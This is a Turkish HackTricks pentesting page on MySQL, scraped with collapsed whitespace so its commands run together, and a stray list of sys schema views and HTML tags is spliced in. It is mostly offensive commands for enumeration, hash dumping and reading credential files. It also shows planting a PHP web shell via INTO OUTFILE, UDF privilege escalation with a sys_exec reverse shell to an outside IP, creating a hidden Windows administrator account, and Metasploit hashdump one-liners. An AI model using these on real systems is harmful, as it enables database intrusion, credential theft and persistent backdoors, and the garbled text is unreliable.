Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na(https://github.com/sponsors/carlospolop) göz atın!
Hacking püf noktalarınızı paylaşarak PR göndererekHackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
RootedCONİspanya'daki en ilgili siber güvenlik etkinliği ve Avrupa'nın en önemlilerinden biridir. Teknik bilgiyi teşvik etme misyonu ile bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
MySQL, ücretsiz olarak sunulan açık kaynaklı bir İlişkisel Veritabanı Yönetim Sistemi (RDBMS) olarak tanımlanabilir. Yapılandırılmış Sorgu Dili (SQL) üzerinde çalışır ve veritabanlarının yönetimini ve manipülasyonunu sağlar.
Varsayılan port: 3306
3306/tcp open mysql
Bağlan
Yerel
mysql-uroot# Connect to root without passwordmysql-uroot-p# A password will be asked (check someone)
showdatabases;use<database>;connect<database>;showtables;describe<table_name>;showcolumnsfrom<table>;select version(); #versionselect @@version(); #versionselect user(); #Userselect database(); #database name#Get a shell with the mysql client user\!sh#Basic MySQLiUnionSelect1,2,3,4,group_concat(0x7c,table_name,0x7C) frominformation_schema.tablesUnionSelect1,2,3,4,column_namefrominformation_schema.columnswheretable_name="<TABLE NAME>"#Read & Write## Yo need FILE privilege to read & write to files.select load_file('/var/lib/mysql-files/key.txt'); #Read fileselect 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'#Try to change MySQL root passwordUPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';FLUSH PRIVILEGES;quit;
mysql-uusername-p<manycommands.sql#A file with all the commands you want to executemysql-uroot-h127.0.0.1-e'show databases;'
MySQL İzinleri Sıralaması
#MysqlSHOW GRANTS [FOR user];SHOW GRANTS;SHOW GRANTS FOR'root'@'localhost';SHOW GRANTS FORCURRENT_USER();# Get users, permissions & hashesSELECT*FROM mysql.user;#From DBselect*from mysql.user where user='root';## Get users with file_privselect user,file_priv from mysql.user where file_priv='Y';## Get users with Super_privselect user,Super_priv from mysql.user where Super_priv='Y';# List functionsSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION';#@ Functions notfrom sys. dbSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION'AND routine_schema!='sys';
Aslında, bir tabloya yerel veri yüklemeyi denediğinizde, MySQL veya MariaDB sunucusunun istemciden okumasını istediği bir dosyanın içeriği. Ardından, bir mysql istemcisini kendi MySQL sunucunuza bağlanacak şekilde manipüle edebilirseniz, keyfi dosyaları okuyabilirsiniz.
Lütfen bunun kullanım davranışı olduğuna dikkat edin:
( "local" kelimesine dikkat edin)
Çünkü "local" olmadan şunu elde edebilirsiniz:
mysql>loaddatainfile"/etc/passwd"intotabletestFIELDSTERMINATEDBY'\n';ERROR1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
RootedCONİspanya'daki en ilgili siber güvenlik etkinliği ve Avrupa'nın en önemlilerinden biridir. Teknik bilgiyi teşvik etme misyonuyla, bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
POST
Mysql Kullanıcısı
Eğer mysql root olarak çalışıyorsa çok ilginç olacaktır:
MySQL hizmetlerinin yapılandırmasında, işleyişini ve güvenlik önlemlerini tanımlamak için çeşitli ayarlar kullanılır:
user ayarı, MySQL hizmetinin hangi kullanıcı altında yürütüleceğini belirlemek için kullanılır.
password, MySQL kullanıcısı ile ilişkilendirilen şifrenin belirlenmesi için kullanılır.
admin_address, yönetim ağı arayüzünde TCP/IP bağlantıları için dinleyen IP adresini belirtir.
debug değişkeni, mevcut hata ayarlarını gösterir ve günlüklerde hassas bilgiler içerebilir.
sql_warnings, uyarılar ortaya çıktığında tek satırlık INSERT ifadeleri için bilgi dizelerinin oluşturulup oluşturulmayacağını yönetir ve günlüklerde hassas veriler içerebilir.
secure_file_priv ile veri içe ve dışa aktarma işlemlerinin kapsamı sınırlanır ve güvenliği artırılır.
Yetki Yükseltme
# Get current user (an all users) privileges and hashesusemysql;select user();select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;# Get users, permissions & credsSELECT*FROMmysql.user;mysql-uroot--password=<PASSWORD>-e"SELECT * FROM mysql.user;"# Create user and give privilegescreateusertestidentifiedby'test';grantSELECT,CREATE,DROP,UPDATE,DELETE,INSERTon*.*tomysqlidentifiedby'mysql'WITHGRANTOPTION;# Get a shell (with your permissions, usefull for sudo/suid privesc)\!sh
Kütüphane aracılığıyla Yetki Yükseltme
Eğer mysql sunucusu root olarak çalışıyorsa (veya daha fazla ayrıcalıklı bir kullanıcı), komutları çalıştırmasını sağlayabilirsiniz. Bunun için kullanıcı tanımlı fonksiyonları kullanmanız gerekmektedir. Ve bir kullanıcı tanımlı oluşturmak için mysql'in çalıştığı işletim sistemi için bir kütüphane'ye ihtiyacınız olacak.
Kötü niyetli kütüphaneyi kullanmak için sqlmap içinde ve metasploit içinde locate "*lib_mysqludf_sys*" komutunu kullanarak bulabilirsiniz. .so dosyaları linux kütüphaneleridir ve .dll dosyaları Windows kütüphaneleridir, ihtiyacınıza göre seçim yapabilirsiniz.
Eğer bu kütüphanelere sahip değilseniz, ya onları arayabilirsiniz, ya da bu linux C kodunu indirip ve linux zafiyetli makine içinde derleyebilirsiniz:
Şimdi kütüphaneye sahip olduğunuza göre, Mysql'e ayrıcalıklı bir kullanıcı olarak (root?) giriş yapın ve aşağıdaki adımları izleyin:
Linux
# Use a databaseuse mysql;# Create a tabletoload the library andmove it to the plugins dircreatetablenpn(line blob);# Load the binary library inside the table## You might need to change the pathandfilenameinsert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));# Get the plugin_dir pathshow variables like'%plugin%';# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/# dumpin there the libraryselect*from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';# Create a functiontoexecute commandscreatefunctionsys_execreturnsinteger soname 'lib_mysqludf_sys.so';# Execute commandsselect sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indicationsUSE mysql;CREATETABLEnpn(line blob);INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));show variables like'%plugin%';SELECT*FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATEFUNCTIONsys_execRETURNSinteger SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user npn npn12345678 /add");SELECT sys_exec("net localgroup Administrators npn /add");
Dosyalarından MySQL kimlik bilgilerini çıkarma
/etc/mysql/debian.cnf içinde debian-sys-maint kullanıcısının düz metin şifresini bulabilirsiniz
cat/etc/mysql/debian.cnf
Mysql veritabanına giriş yapmak için bu kimlik bilgilerini kullanabilirsiniz.
Dosyanın içinde: /var/lib/mysql/mysql/user.MYDMySQL kullanıcılarının tüm hash'lerini bulabilirsiniz (veritabanı içindeki mysql.user'dan çıkarabileceğiniz hash'ler).
schema_table_statistics\schema_table_statistics_with_buffer\schema_tables_with_full_table_scans\schema_unused_indexes\session\session_ssl_status\statement_analysis\statements_with_errors_or_warnings\statements_with_full_table_scans\statements_with_runtimes_in_95th_percentile\statements_with_sorting\statements_with_temp_tables\sys_config\user_summary\user_summary_by_file_io\user_summary_by_file_io_type\user_summary_by_stages\user_summary_by_statement_latency\user_summary_by_statement_type\version\wait_classes_global_by_avg_latency\wait_classes_global_by_latency\waits_by_host_by_latency\waits_by_user_by_latency\waits_global_by_latency\x$host_summary\x$host_summary_by_file_io\x$host_summary_by_file_io_type\x$host_summary_by_stages\x$host_summary_by_statement_latency\x$host_summary_by_statement_type\x$innodb_buffer_stats_by_schema\x$innodb_buffer_stats_by_table\x$innodb_lock_waits\x$io_by_thread_by_latency\x$io_global_by_file_by_bytes\x$io_global_by_file_by_latency\x$io_global_by_wait_by_bytes\x$io_global_by_wait_by_latency\x$latest_file_io\x$memory_by_host_by_current_bytes\x$memory_by_thread_by_current_bytes\x$memory_by_user_by_current_bytes\x$memory_global_by_current_bytes\x$memory_global_total\x$processlist\x$ps_digest_95th_percentile_by_avg_us\x$ps_digest_avg_latency_distribution\x$ps_schema_table_statistics_io\x$schema_flattened_keys\x$schema_index_statistics\x$schema_table_lock_waits\x$schema_table_statistics\x$schema_table_statistics_with_buffer\x$schema_tables_with_full_table_scans\x$session\x$statement_analysis\x$statements_with_errors_or_warnings\x$statements_with_full_table_scans\x$statements_with_runtimes_in_95th_percentile\x$statements_with_sorting\x$statements_with_temp_tables\x$user_summary\x$user_summary_by_file_io\x$user_summary_by_file_io_type\x$user_summary_by_stages\x$user_summary_by_statement_latency\x$user_summary_by_statement_type\x$wait_classes_global_by_avg_latency\x$wait_classes_global_by_latency\x$waits_by_host_by_latency\x$waits_by_user_by_latency\x$waits_global_by_latency</div></div>## HackTricks Otomatik Komutları
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
RootedCONİspanya'daki en ilgili siber güvenlik etkinliği ve Avrupa'daki en önemlilerden biridir. Teknik bilgiyi teşvik etme misyonu ile bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.